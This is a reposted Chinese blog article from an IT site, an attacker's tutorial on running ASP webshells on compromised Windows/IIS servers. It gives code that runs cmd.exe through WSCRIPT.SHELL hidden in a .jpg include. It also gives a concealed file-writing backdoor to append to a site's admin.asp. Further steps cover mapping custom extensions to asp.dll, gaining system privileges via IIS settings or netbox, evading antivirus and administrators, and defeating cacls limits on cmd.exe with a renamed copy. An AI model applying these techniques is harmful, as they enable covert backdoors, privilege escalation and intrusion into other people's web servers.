ITPub博客

首页 > 应用开发 > IT综合 > 突破常规限制运行asp木马(转)

突破常规限制运行asp木马(转)

原创 IT综合 作者:worldblog 时间:2007-09-18 14:12:45 0 删除 编辑
突破常规限制运行asp木马(转)[@more@]

  脚本入侵中往往会上传一个asp木马来进一步扩大权限,或者在肉鸡中留一个asp后门也是一个不错的选择。但是如何让asp木马更加隐匿和强大,从而躲过网管查杀逃过杀毒软件追杀,并且具备system权限呢?改变代码变量也许是一个解决问题的办法,但是我们不如换个角度思考,何不尝试改变asp木马的运行方式?

  首先,我们可以换个任意后缀来运行asp木马。换任意后缀来运行asp文件方法有两种,一种是include指令的使用。include指令可以让我们直接调用位于其它文件的函数,而不管后缀名是什么。像我写了一个简单的asp木马,功能是遍历c:盘,源码如下:

  <%Set oScript = Server.CreateObject("WSCRIPT.SHELL") oScript.Run ("cmd.exe /c dir c: > c:lcx.txt ") %>

  我们可以将这段源码保存成1.jpg,然后将这句指令<!--#include file="1.jpg"-->放在2.asp文件的文件头或文件尾,那么我们执行2.asp时,放在2.asp同目录下的1.jpg同样也会被调用,起到遍历c:的功能即在c:下生成lcx.txt这一文件。第二种方法是iis管理器中用asp.dll来解析任意后缀。在iis默认安装情况下,我们可以查觉asa、cer、cdx后缀也可以成功运行asp代码,因为这三种后缀的文件映射都是调用了系统的asp.dll。根据这一启示,我们可以做一个.lcx的后缀映射,用ntsystem32下的asp.dll来解析,这样做完后写有asp源码的lcx后缀文件也会成功运行asp程序。其方法是依次打开电脑的控制面板-管理工具-Internet 服务管理器-web站点-右键属性-主目录-配置-添加。图1。

  其次,我们可以让asp木马来触发才运行。无论你的asp木马写得多么好,基本总会调用到WSCRIPT.SHELL和Scripting.FileSystemObject这两个对象。有经验的网管可以运行查找功能,让你的木马无处可逃。(这里我也顺便给大家提供一个启明星工作室编写的查找asp木马的工具,见附件)我们能不能做到调用这两个对象的asp木马不放在肉鸡上,需要时能够随时上传运行呢?runasp.asp是一个用asp实现asp文件的运行的脚本,虽然还有很多bug,但是对我们调用执行asp木马是足够用了。更为可怕的是我在runasp.asp里调用测试一些恶意代码时,居然躲过了瑞星的查杀。图2。(由于runasp.asp代码太多,文章里不方便列出,我已将其放在附件里了,大家可以自己研究一下)我们将runasp.asp放在肉鸡上是不是一个很好的asp触发器后门呢?另外,对付粗心的网管我们还可以将这样一段代码放在asp文件里:

  <%

  on error resume next

  id=request("id")

  if request("id")=1 then

  testfile=Request.form("name")

  msg=Request.form("message")

  set fs=server.CreateObject("scripting.filesystemobject")

  set thisfile=fs.OpenTextFile(testfile,8,True,0)

  thisfile.WriteLine(""&msg& "")

  thisfile.close

  set fs = nothing

  %>

  

  

  value=<%=server.mappath("xp.asp")%>>

  

  <;input type="submit" name="Send" value="生成" class=input>

  

  <% end if%>

  像我放在动网文章的admin.asp的文件尾端,当网管运行http://动网文章url/admin.asp时并没有引起丝毫变化,而当我们运行http://动网文章url/admin.asp?id=1时,就可以根据我们的需要生成任意asp木马文件了。

  最后,我们要让asp木马具备系统权限。我们的木马现在隐匿得很深,躲过了细心网管和杀毒软件,不具备系统权限我们心有不甘。让asp木马具备系统权限的方法有三种,第一种是在iis管理器中的主目录选项里将应用程序保护选择为:低(iis进程)图3。第二种是将"IWAM_machine"这一用户加入administrators组即可。这两种方法我想大家也许都耳熟能详了,但第3种也许就不为人所知了。netbox是一款由北京综艺达软件技术有限公司自主研制的编译及开发工具,除了Apache和微软的IIS以外,目前是世界上第三个可以运行asp的应用服务器,在Windows98/NT/2000/Me/XP下都可以直接运行,而且是一个大小仅为440kb的绿色文件。我已将netbox配置好了(请见附件的netbox文件夹),大家使用的时候,只需将netbox文件夹放在某个盘符下,再在cmd下运行"x: etbox etbox.exe -install"即可安装成功netbox,以后就可以运行http://ip:88/x.asp了。需要指出的是我在netbox的配置文件里main.box里写了这样两行代码:

  If httpd.Create("", 88) = 0 Then

  Set host = httpd.AddHost("", "wwwroot")

  意思是web的端口为88,asp文件放在netbox目录下的wwwroot文件夹。这个端口和文件夹,你都可以根据自己的需要用记事本打开main.box来修改你所想要的。我们使用这一软件最大的一个好处是我们的asp木马在netbox环境下具备了系统权限,也许用它在肉鸡上做主页留后门也是一个不错的选择哟。

  另外,因为我整篇文章写得是如何突破常规限制来运行asp木马,所以还有一点我要提及。在黑客防线2003年7期xhacker有篇文章《巧妙设置cmd权限加强主机安全配置》提到过防止网上流行的cmd.asp木马(见附件)方法是可以用

  cacls %systemroot/system32/cmd.exe /E /D IUSR_machine

  cacls %systemroot/system32/dllcache/cmd.exe /E /D IUSR_machine

  这样两条命令来限止cmd.exe的权限,于是cmd.asp木马就失去作用了。针对这种限制我们也有办法突破,我们可以将本机的cmd.exe改名传到肉鸡上,假设我们将cmd.exe改名为lcx.exe,传在肉鸡的d:lcx目录下,于是我们打开cmd.asp, 找到

  Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)这一行源码,改为

  Call oScript.Run ("d:lcxlcx.exe /c " & szCMD & " > " & szTempFile, 0, True)即可,我们又可以成功运行cmd.asp了。

  总之,如何能更好地运行asp木马,发挥出它的强大功能,还是需要我们多动脑多动手,只有这样我们才会有新的发现。

  

本文来自:http://www.linuxpk.com/30497.html

-->linux电子图书免费下载和技术讨论基地

·上一篇:拒绝网络攻击—局域网内

·下一篇:漠漠孤云尽成雨---浅谈CGI脚本安全
 
     最新更新
·注册表备份和恢复

·低级格式化的主要作用

·如何防范恶意网站

·常见文件扩展名和它们的说明

·专家:警惕骇客骗局,严守企业信息

·PGPforWindows介紹基本设定(2)

·解剖安全帐号管理器(SAM)结构

·“恶作剧之王”揭秘

·绿色警戒

·黑客反击战

·网络四大攻击方法及安全现状描述

·可攻击3种浏览器代码流于互联网

·黑客最新的兴趣点,下个目标会是谁?

·“僵尸”——垃圾邮件的主要传播源

·Lebreat蠕虫惊现3变种

·POSTFIX反病毒反垃圾Ų…

·在FreeBSD上用PHP实现在线添加FTP用户

·简单让你在FreeBSDADSL上…

·安全版本:OpenBSD入门技巧解析

·Internet连接共享上网完全攻略

·关于ADSL上网网速常识

·静态缓存和动态缓存的比较

·最友好的SQL注入防御方法

·令网站提速的7大秘方

·网络基础知识大全

·路由基本知识

·端口映射的几种实现方法

·VLAN经典诠释

·问题分析与解决——ADSL错误代码

·问题分析——关于2条E1的线路绑定


关于我们 | 联系方式 | 广告合作 | 诚聘英才 | 网站地图 | 网址大全 | 友情链接 | 免费注册

Copyright © 2004 - 2007 All Rights Reserved

来自 “ ITPUB博客 ” ,链接:http://blog.itpub.net/10752043/viewspace-969898/,如需转载,请注明出处,否则将追究法律责任。

请登录后发表评论 登录
全部评论